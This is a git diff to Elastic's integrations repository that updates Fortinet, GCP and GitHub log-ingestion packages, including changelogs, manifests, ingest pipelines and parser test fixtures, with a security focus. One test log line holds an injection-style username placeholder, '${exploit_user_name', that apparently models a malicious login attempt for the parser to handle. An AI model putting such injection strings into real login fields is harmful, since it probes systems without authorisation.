https://github.com/elastic/integrations/pull/9235 - version: "1.14.2" changes: - description: Changed owners diff --git a/packages/fortinet_fortiedr/manifest.yml b/packages/fortinet_fortiedr/manifest.yml index 6e88e2888e4..ecbe146d966 100644 --- a/packages/fortinet_fortiedr/manifest.yml +++ b/packages/fortinet_fortiedr/manifest.yml @@ -1,9 +1,9 @@ name: fortinet_fortiedr title: Fortinet FortiEDR Logs -version: "1.14.2" +version: "1.15.0" description: Collect logs from Fortinet FortiEDR instances with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "edr_xdr"] conditions: kibana: diff --git a/packages/fortinet_fortigate/changelog.yml b/packages/fortinet_fortigate/changelog.yml index 193d2a5dbb5..7fd36887138 100644 --- a/packages/fortinet_fortigate/changelog.yml +++ b/packages/fortinet_fortigate/changelog.yml @@ -1,4 +1,24 @@ # newer versions go on top +- version: "1.25.2" + changes: + - description: Fix parsing failed logins from https. + type: bugfix + link: https://github.com/elastic/integrations/issues/9245 +- version: "1.25.1" + changes: + - description: Ensure event.original matches the value of the message field. + type: bugfix + link: https://github.com/elastic/integrations/pull/9438 +- version: "1.25.0" + changes: + - description: Add more sanitization for unwanted characters. + type: enhancement + link: https://github.com/elastic/integrations/pull/9384 +- version: "1.24.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "1.23.2" changes: - description: Changed owners diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json new file mode 100644 index 00000000000..1a0d6b9ccf0 --- /dev/null +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json @@ -0,0 +1,10 @@ +{ + "events": [ + { + "message": "<188>date=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", + "event": { + "original": "{\\\"message\\\":\\\"<188>date=2020-04-23 time=12:17:48 devname=\\\"testswitch1\\\" devid=\\\"somerouterid\\\" logid=\\\"0316013056\\\" type=\\\"utm\\\" subtype=\\\"webfilter\\\" eventtype=\\\"ftgd_blk\\\" level=\\\"warning\\\" vd=\\\"root\\\" eventtime=1587230269052907555 tz=\\\"-0500\\\" policyid=100602 sessionid=1234 user=\\\"elasticuser\\\" group=\\\"elasticgroup\\\" authserver=\\\"elasticauth\\\" srcip=192.168.2.1 srcport=61930 srcintf=\\\"port1\\\" srcintfrole=\\\"lan\\\" dstip=67.43.156.13 dstport=443 dstintf=\\\"wan1\\\" dstintfrole=\\\"wan\\\" proto=6 service=\\\"HTTPS\\\" hostname=\\\"elastic.co\\\" profile=\\\"elasticruleset\\\" action=\\\"blocked\\\" reqtype=\\\"direct\\\" url=\\\"/config/\\\" sentbyte=1152 rcvdbyte=1130 direction=\\\"outgoing\\\" msg=\\\"URL belongs to a denied category in policy\\\" method=\\\"domain\\\" cat=76 catdesc=\\\"Internet Telephony\\\"\"}" + } + } + ] +} diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json-expected.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json-expected.json new file mode 100644 index 00000000000..f52dfc32f4d --- /dev/null +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json-expected.json @@ -0,0 +1,126 @@ +{ + "expected": [ + { + "@timestamp": "2020-04-23T12:17:48.000-05:00", + "destination": { + "as": { + "number": 35908 + }, + "bytes": 1130, + "geo": { + "continent_name": "Asia", + "country_iso_code": "BT", + "country_name": "Bhutan", + "location": { + "lat": 27.5, + "lon": 90.5 + } + }, + "ip": "67.43.156.13", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ftgd_blk", + "category": [ + "network" + ], + "code": "0316013056", + "kind": "event", + "original": "<188>date=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", + "outcome": "success", + "start": "2020-04-18T12:17:49.052-05:00", + "timezone": "-0500", + "type": [ + "denied" + ] + }, + "fortinet": { + "firewall": { + "action": "blocked", + "authserver": "elasticauth", + "cat": "76", + "dstintfrole": "wan", + "method": "domain", + "reqtype": "direct", + "sessionid": "1234", + "srcintfrole": "lan", + "subtype": "webfilter", + "type": "utm", + "vd": "root" + } + }, + "log": { + "level": "warning", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 188, + "severity": { + "code": 4 + } + } + }, + "message": "URL belongs to a denied category in policy", + "network": { + "bytes": 2282, + "direction": "outbound", + "iana_number": "6", + "protocol": "https", + "transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "wan1" + } + }, + "ingress": { + "interface": { + "name": "port1" + } + }, + "name": "testswitch1", + "product": "Fortigate", + "serial_number": "somerouterid", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "192.168.2.1", + "67.43.156.13" + ], + "user": [ + "elasticuser" + ] + }, + "rule": { + "category": "Internet Telephony", + "id": "100602", + "ruleset": "elasticruleset" + }, + "source": { + "bytes": 1152, + "ip": "192.168.2.1", + "port": 61930, + "user": { + "group": { + "name": "elasticgroup" + }, + "name": "elasticuser" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "elastic.co", + "path": "/config/" + } + } + ] +} \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log new file mode 100644 index 00000000000..93ddb4826ff Binary files /dev/null and b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log differ diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log-expected.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log-expected.json new file mode 100644 index 00000000000..7c9e00f6cf7 --- /dev/null +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log-expected.json @@ -0,0 +1,214 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-15T22:12:57.000-07:00", + "destination": { + "bytes": 1140, + "ip": "172.16.200.99", + "packets": 15, + "port": 123 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "accept", + "category": [ + "network" + ], + "code": "0000000013", + "duration": 294000000000, + "kind": "event", + "original": "date=2024-03-15 time=22:12:57 devname=\"foo\" devid=\"bar\" eventtime=1710565976971231921 tz=\"-0700\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" srcip=10.1.100.66 srcport=123 srcintf=\"srv1\" srcintfrole=\"lan\" dstip=172.16.200.99 dstport=123 dstintf=\"port13\" dstintfrole=\"wan\" srccountry=\"Reserved\" dstcountry=\"United States\" sessionid=40433307 proto=17 action=\"accept\" policyid=26 policytype=\"policy\" poluuid=\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\" policyname=\"pol1\" service=\"NTP\" trandisp=\"snat\" transip=10.1.100.11 transport=60540 duration=294 sentbyte=1140 rcvdbyte=1140 sentpkt=15 rcvdpkt=15 appcat=\"unscanned\" srchwvendor=\"Baz\" devtype=\"Router\" mastersrcmac=\"ff:f0:ff:ff:2e:07\" srcmac=\"ff:ff:ff:1b:ff:07\" srcserver=0 \u0004��\u0000 \u0000D\f<\u0000\u0000\u0000$\u0000\u0000\u0000\u0015e��\u0001\u0000\u0000\u0000=���\u0001\u0000\u0000\u0000��������", + "outcome": "success", + "start": "2024-03-15T22:12:56.971-07:00", + "timezone": "-0700", + "type": [ + "connection", + "end", + "allowed" + ] + }, + "fortinet": { + "firewall": { + "action": "accept", + "devtype": "Router", + "dstcountry": "United States", + "dstintfrole": "wan", + "mastersrcmac": "ff:f0:ff:ff:2e:07", + "sessionid": "40433307", + "srccountry": "Reserved", + "srchwvendor": "Baz", + "srcintfrole": "lan", + "srcserver": "0", + "subtype": "forward", + "trandisp": "snat", + "transip": "10.1.100.11", + "type": "traffic", + "vd": "root" + } + }, + "log": { + "level": "notice" + }, + "network": { + "bytes": 2280, + "direction": "internal", + "iana_number": "17", + "packets": 30, + "protocol": "ntp", + "transport": "udp" + }, + "observer": { + "egress": { + "interface": { + "name": "port13" + } + }, + "ingress": { + "interface": { + "name": "srv1" + } + }, + "name": "foo", + "product": "Fortigate", + "serial_number": "bar", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "10.1.100.66", + "172.16.200.99", + "10.1.100.11" + ] + }, + "rule": { + "category": "unscanned", + "id": "26", + "name": "pol1", + "ruleset": "policy", + "uuid": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa" + }, + "source": { + "bytes": 1140, + "ip": "10.1.100.66", + "mac": "FF-FF-FF-1B-FF-07", + "nat": { + "ip": "10.1.100.11", + "port": 60540 + }, + "packets": 15, + "port": 123 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-03-16T10:16:59.000-07:00", + "destination": { + "bytes": 76, + "ip": "172.16.200.99", + "packets": 1, + "port": 123 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "accept", + "category": [ + "network" + ], + "code": "0000000013", + "duration": 180000000000, + "kind": "event", + "original": "date=2024-03-16 time=10:16:59 devname=\"foo\" devid=\"bar\" eventtime=1710609419481230122 tz=\"-0700\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" srcip=10.1.100.66 srcport=59475 srcintf=\"srv1\" srcintfrole=\"lan\" dstip=172.16.200.99 dstport=123 dstintf=\"port13\" dstintfrole=\"wan\" srccountry=\"Reserved\" dstcountry=\"United States\" sessionid=40469528 proto=17 action=\"accept\" policyid=20 policytype=\"policy\" poluuid=\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\" policyname=\"pol2\" service=\"NTP\" trandisp=\"snat\" transip=10.1.100.11 transport=59475 duration=180 sentbyte=76 rcvdbyte=76 sentpkt=1 rcvdpkt=1 appcat=\"unscanned\" srchwvendor=\"Baz\" devtype=\"Router\" mastersrcmac=\"ff:f0:04:ff:ff:07\" srcmac=\"ff:f0:04:ff:ff:07\" srcserver=0 \u0004��\u0000 \u0000D\f<\u0000\u0000\u0000$\u0000\u0000\u0000=���\u0001\u0000\u0000\u0000E���\u0001\u0000\u0000\u0000��������", + "outcome": "success", + "start": "2024-03-16T10:16:59.481-07:00", + "timezone": "-0700", + "type": [ + "connection", + "end", + "allowed" + ] + }, + "fortinet": { + "firewall": { + "action": "accept", + "devtype": "Router", + "dstcountry": "United States", + "dstintfrole": "wan", + "mastersrcmac": "ff:f0:04:ff:ff:07", + "sessionid": "40469528", + "srccountry": "Reserved", + "srchwvendor": "Baz", + "srcintfrole": "lan", + "srcserver": "0", + "subtype": "forward", + "trandisp": "snat", + "transip": "10.1.100.11", + "type": "traffic", + "vd": "root" + } + }, + "log": { + "level": "notice" + }, + "network": { + "bytes": 152, + "direction": "internal", + "iana_number": "17", + "packets": 2, + "protocol": "ntp", + "transport": "udp" + }, + "observer": { + "egress": { + "interface": { + "name": "port13" + } + }, + "ingress": { + "interface": { + "name": "srv1" + } + }, + "name": "foo", + "product": "Fortigate", + "serial_number": "bar", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "10.1.100.66", + "172.16.200.99", + "10.1.100.11" + ] + }, + "rule": { + "category": "unscanned", + "id": "20", + "name": "pol2", + "ruleset": "policy", + "uuid": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa" + }, + "source": { + "bytes": 76, + "ip": "10.1.100.66", + "mac": "FF-F0-04-FF-FF-07", + "nat": { + "ip": "10.1.100.11", + "port": 59475 + }, + "packets": 1, + "port": 59475 + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log index 7b214be1f9f..4bb19570088 100644 --- a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log @@ -50,4 +50,5 @@ date= desc="Object update request from device of FortiClient received" msg="Send <190>date=2023-12-13 time=07:56:14 tz="+0200" devname=firewallhost01 device_id=FMG123TZ13111111 log_id=0001010018 type=event subtype=system pri=information desc="User login/logout successful" user="philipp" userfrom="JSON(192.168.0.10)" msg="user 'philipp' with profile 'Super_User' login accepted from JSON(192.168.0.10)" session_id=12345 adminprof="Super_User" <185>date=2023-12-13 time=03:33:34 tz="+0200" devname=firewallhost01 device_id=FMG123TZ13111111 log_id=0001010014 type=event subtype=system pri=alert desc="User login from SSH failed" user="philipp" msg="Login from ssh: Failed for philipp from 192.168.0.10 port 38654" remote_ip="192.168.0.10" remote_port=38654 valid=1 authmsg="Failed" extrainfo="" <185>eventtime=1702257752722386015 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="root" logdesc="Admin login failed" sn="0" user="philipp" ui="ssh(192.168.0.10)" method="ssh" srcip=192.168.0.10 dstip=10.123.26.241 action="login" status="failed" reason="ssh_key_invalid" msg="Administrator philipp login failed from ssh(192.168.0.10) because of invalid ssh key" -<185>eventtime=1702329825833960934 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="root" logdesc="Admin login failed" sn="0" user="${exploit_user_name" ui="ssh(192.168.0.10)" method="ssh" srcip=192.168.0.10 dstip=10.123.26.240 action="login" status="failed" reason="passwd_invalid" msg="Administrator ${exploit_user_name login failed from ssh(192.168.0.10) because of invalid password" \ No newline at end of file +<185>eventtime=1702329825833960934 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="root" logdesc="Admin login failed" sn="0" user="${exploit_user_name" ui="ssh(192.168.0.10)" method="ssh" srcip=192.168.0.10 dstip=10.123.26.240 action="login" status="failed" reason="passwd_invalid" msg="Administrator ${exploit_user_name login failed from ssh(192.168.0.10) because of invalid password" +<185>date=2024-02-26 time=11:10:55 devname="FW-INT_01_01" devid="FG1K5DKKKKKK" eventtime=1708942255551034463 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="Int" logdesc="Admin login failed" sn="0" user="name.lastname" ui="https(192.168.1.1)" method="https" srcip=192.168.1.1 dstip=10.10.10.10 action="login" status="failed" reason="passwd_invalid" msg="Administrator name.lastname login failed from https(192.168.1.1) because of invalid password" \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json index fb3336e13e5..5f470708c5a 100644 --- a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json @@ -4605,6 +4605,94 @@ "Administrator" ] } + }, + { + "@timestamp": "2024-02-26T11:10:55.000+01:00", + "_tmp": { + "user": {} + }, + "destination": { + "ip": "10.10.10.10" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "login", + "category": [ + "authentication" + ], + "code": "0100032002", + "kind": "event", + "original": "<185>date=2024-02-26 time=11:10:55 devname=\"FW-INT_01_01\" devid=\"FG1K5DKKKKKK\" eventtime=1708942255551034463 tz=\"+0100\" logid=\"0100032002\" type=\"event\" subtype=\"system\" level=\"alert\" vd=\"Int\" logdesc=\"Admin login failed\" sn=\"0\" user=\"name.lastname\" ui=\"https(192.168.1.1)\" method=\"https\" srcip=192.168.1.1 dstip=10.10.10.10 action=\"login\" status=\"failed\" reason=\"passwd_invalid\" msg=\"Administrator name.lastname login failed from https(192.168.1.1) because of invalid password\"", + "outcome": "failure", + "reason": "passwd_invalid", + "start": "2024-02-26T11:10:55.551+01:00", + "timezone": "+0100" + }, + "fortinet": { + "firewall": { + "action": "login", + "method": "https", + "sn": "0", + "subtype": "system", + "type": "event", + "vd": "Int" + } + }, + "log": { + "level": "alert", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 185, + "severity": { + "code": 1 + } + } + }, + "message": "Administrator name.lastname login failed from https(192.168.1.1) because of invalid password", + "network": { + "direction": "internal" + }, + "observer": { + "name": "FW-INT_01_01", + "product": "Fortigate", + "serial_number": "FG1K5DKKKKKK", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "192.168.1.1", + "10.10.10.10" + ], + "user": [ + "name.lastname" + ] + }, + "rule": { + "description": "Admin login failed" + }, + "source": { + "ip": "192.168.1.1", + "user": { + "name": "name.lastname", + "roles": [ + "Administrator" + ] + } + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "name.lastname", + "roles": [ + "Administrator" + ] + } } ] } \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 0f4aff06dcd..6d9f800a2ae 100644 --- a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -4,11 +4,11 @@ processors: - set: field: ecs.version value: '8.11.0' - - rename: + - set: + field: event.original + copy_from: message + - remove: field: message - target_field: event.original - ignore_missing: true - if: ctx.event?.original == null - grok: field: event.original ecs_compatibility: v1 @@ -28,7 +28,7 @@ processors: } - gsub: field: syslog5424_sd - pattern: "\u0000" + pattern: "[\u0000-\u001F\u007F]" replacement: "" - script: lang: painless @@ -80,7 +80,9 @@ processors: source: | def fw = ctx.fortinet?.firewall; if (fw != null) { - fw.entrySet().removeIf(entry -> entry.getValue() == "N/A"); + // We will remove any keys that are non-words to avoid polluting documents + def pat = /\W+/; + fw.entrySet().removeIf(entry -> entry.getValue() == "N/A" || pat.matcher(entry.getKey()).find()); } - set: field: observer.vendor diff --git a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml index d0632356458..10bb0a6d68a 100644 --- a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml +++ b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml @@ -57,7 +57,7 @@ processors: - dissect: field: "message" tag: "ssh login 2" - pattern: "%{_tmp.user.roles} %{user.name} login %{event.outcome} from ssh(%{source.ip}) %{}" + pattern: "%{_tmp.user.roles} %{user.name} login %{event.outcome} from %{}(%{source.ip}) %{}" if: "ctx.message != null && ctx.message.startsWith('Administrator')" on_failure: - append: diff --git a/packages/fortinet_fortigate/manifest.yml b/packages/fortinet_fortigate/manifest.yml index 5a524fa8274..924b0a6f447 100644 --- a/packages/fortinet_fortigate/manifest.yml +++ b/packages/fortinet_fortigate/manifest.yml @@ -1,9 +1,9 @@ name: fortinet_fortigate title: Fortinet FortiGate Firewall Logs -version: 1.23.2 +version: "1.25.2" description: Collect logs from Fortinet FortiGate firewalls with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "network", "firewall_security"] conditions: kibana: diff --git a/packages/fortinet_fortimail/changelog.yml b/packages/fortinet_fortimail/changelog.yml index 6034ef27d02..66ed2b27725 100644 --- a/packages/fortinet_fortimail/changelog.yml +++ b/packages/fortinet_fortimail/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.13.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.12.2" changes: - description: Changed owners diff --git a/packages/fortinet_fortimail/manifest.yml b/packages/fortinet_fortimail/manifest.yml index 9d3d83f533c..c2d58416ab3 100644 --- a/packages/fortinet_fortimail/manifest.yml +++ b/packages/fortinet_fortimail/manifest.yml @@ -1,9 +1,9 @@ name: fortinet_fortimail title: Fortinet FortiMail -version: "2.12.2" +version: "2.13.0" description: Collect logs from Fortinet FortiMail instances with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "email_security"] conditions: kibana: diff --git a/packages/fortinet_fortimanager/changelog.yml b/packages/fortinet_fortimanager/changelog.yml index d1cdc986ea1..2cdef872fb9 100644 --- a/packages/fortinet_fortimanager/changelog.yml +++ b/packages/fortinet_fortimanager/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.11.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.10.2" changes: - description: Changed owners diff --git a/packages/fortinet_fortimanager/manifest.yml b/packages/fortinet_fortimanager/manifest.yml index 6dbb6652d01..4f560ab4f96 100644 --- a/packages/fortinet_fortimanager/manifest.yml +++ b/packages/fortinet_fortimanager/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: fortinet_fortimanager title: Fortinet FortiManager Logs -version: "2.10.2" +version: "2.11.0" description: Collect logs from Fortinet FortiManager instances with Elastic Agent. type: integration categories: ["security", "network", "firewall_security"] diff --git a/packages/gcp/changelog.yml b/packages/gcp/changelog.yml index 3570ed8b25e..6f91667ef12 100644 --- a/packages/gcp/changelog.yml +++ b/packages/gcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.33.2" + changes: + - description: Add tags and processors to GCP Storage + type: enhancement + link: https://github.com/elastic/integrations/pull/9252 - version: "2.33.1" changes: - description: Update Legacy metric visualization to new metric in GCP Billing overview dashboard. diff --git a/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs b/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs index 96f1e9e46ac..6cc590123e2 100644 --- a/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs +++ b/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs @@ -20,6 +20,16 @@ regions: {{/each}} {{/if}} exclude_labels: {{exclude_labels}} +{{#if processors.length}} +processors: +{{processors}} +{{/if}} +{{#if tags.length}} +tags: +{{#each tags as |tag|}} +- {{tag}} +{{/each}} +{{/if}} metrics: - service: storage metric_types: diff --git a/packages/gcp/data_stream/storage/manifest.yml b/packages/gcp/data_stream/storage/manifest.yml index 4299bb640aa..474a4038ca9 100644 --- a/packages/gcp/data_stream/storage/manifest.yml +++ b/packages/gcp/data_stream/storage/manifest.yml @@ -37,5 +37,22 @@ streams: multi: false required: false show_user: true + - name: tags + type: text + title: Tags + description: Tags to include in the published event + multi: true + required: false + show_user: false + default: + - gcp-storage + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. elasticsearch: index_mode: "time_series" diff --git a/packages/gcp/manifest.yml b/packages/gcp/manifest.yml index f171c04e6fa..d76479248ae 100644 --- a/packages/gcp/manifest.yml +++ b/packages/gcp/manifest.yml @@ -1,6 +1,6 @@ name: gcp title: Google Cloud Platform -version: "2.33.1" +version: "2.33.2" description: Collect logs and metrics from Google Cloud Platform with Elastic Agent. type: integration icons: diff --git a/packages/gcp_pubsub/changelog.yml b/packages/gcp_pubsub/changelog.yml index 9403f90577c..7e6d1e9e4d8 100644 --- a/packages/gcp_pubsub/changelog.yml +++ b/packages/gcp_pubsub/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.13.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.12.1" changes: - description: Changed owners diff --git a/packages/gcp_pubsub/data_stream/generic/manifest.yml b/packages/gcp_pubsub/data_stream/generic/manifest.yml index d72cf3a1249..2ceae87e780 100644 --- a/packages/gcp_pubsub/data_stream/generic/manifest.yml +++ b/packages/gcp_pubsub/data_stream/generic/manifest.yml @@ -44,12 +44,13 @@ streams: show_user: true description: Path to a JSON file containing the credentials and key used to subscribe. - name: credentials_json - type: text + type: password title: Credentials JSON multi: false required: false show_user: true description: JSON blob containing the credentials and key used to subscribe. + secret: true - name: subscription_create type: bool title: Subscription Create diff --git a/packages/gcp_pubsub/manifest.yml b/packages/gcp_pubsub/manifest.yml index 4c154e4acbb..b17182026a3 100644 --- a/packages/gcp_pubsub/manifest.yml +++ b/packages/gcp_pubsub/manifest.yml @@ -1,6 +1,6 @@ name: gcp_pubsub title: Custom Google Pub/Sub Logs -version: "1.12.1" +version: "1.13.0" description: Collect Logs from Google Pub/Sub topics type: integration icons: @@ -8,14 +8,14 @@ icons: title: logo gcp size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" categories: - observability - google_cloud - custom conditions: kibana: - version: ^7.16.0 || ^8.0.0 + version: ^8.12.0 policy_templates: - name: gcp title: Custom Google Pub/Sub Logs diff --git a/packages/github/changelog.yml b/packages/github/changelog.yml index ce04ccb6cb1..cedc2bfec30 100644 --- a/packages/github/changelog.yml +++ b/packages/github/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.28.0" + changes: + - description: Set sensitive values as secret and fix incorrect mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "1.27.3" + changes: + - description: Clean up null handling, formatting + type: bugfix + link: https://github.com/elastic/integrations/pull/9181 - version: "1.27.2" changes: - description: Changed owners diff --git a/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 806d54f5260..37092428c1b 100644 --- a/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -20,6 +20,9 @@ processors: - json: field: event.original target_field: json + - fail: + if: "!(ctx.json instanceof Map)" + message: Missing JSON object - fingerprint: fields: - json._document_id @@ -31,7 +34,7 @@ processors: - UNIX_MS timezone: UTC target_field: "@timestamp" - if: ctx.json?.created_at != null + if: ctx.json.created_at != null - date: field: json.@timestamp formats: @@ -99,7 +102,7 @@ processors: field: user.target.group.name copy_from: github.team ignore_empty_value: true - if: ctx.event?.action.startsWith("team.") && ctx.user?.target?.name != null + if: ctx.event?.action?.startsWith("team.") == true && ctx.user?.target?.name != null - set: field: group.name copy_from: github.org @@ -109,7 +112,7 @@ processors: field: user.target.group.name copy_from: github.org ignore_empty_value: true - if: ctx.event?.action.startsWith("org.") && ctx.user?.target?.name != null + if: ctx.event?.action?.startsWith("org.") == true && ctx.user?.target?.name != null - rename: field: json.data.old_user target_field: user.target.group.name @@ -128,7 +131,7 @@ processors: target_field: github.actor_ip type: ip ignore_missing: true - if: ctx.json?.actor_ip != null && ctx.json.actor_ip != '' + if: ctx.json.actor_ip != null && ctx.json.actor_ip != '' on_failure: - append: field: error.message @@ -188,15 +191,15 @@ processors: - append: field: event.type value: creation - if: 'ctx._temp?.action.contains("create") || ctx._temp?.action.contains("add")' + if: ctx._temp?.action?.contains("create") == true || ctx._temp?.action?.contains("add") == true - append: field: event.type value: deletion - if: 'ctx._temp?.action.contains("delete") || ctx._temp?.action.contains("remove")' + if: ctx._temp?.action?.contains("delete") == true || ctx._temp?.action?.contains("remove") == true - append: field: event.type value: change - if: 'ctx.event?.type == null || ctx.event?.type.size() == 0' + if: ctx.event?.type == null || ctx.event.type.size() == 0 - remove: field: - json @@ -204,7 +207,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/audit/manifest.yml b/packages/github/data_stream/audit/manifest.yml index 8049dc51946..e4f5ccd4102 100644 --- a/packages/github/data_stream/audit/manifest.yml +++ b/packages/github/data_stream/audit/manifest.yml @@ -4,12 +4,13 @@ streams: - input: 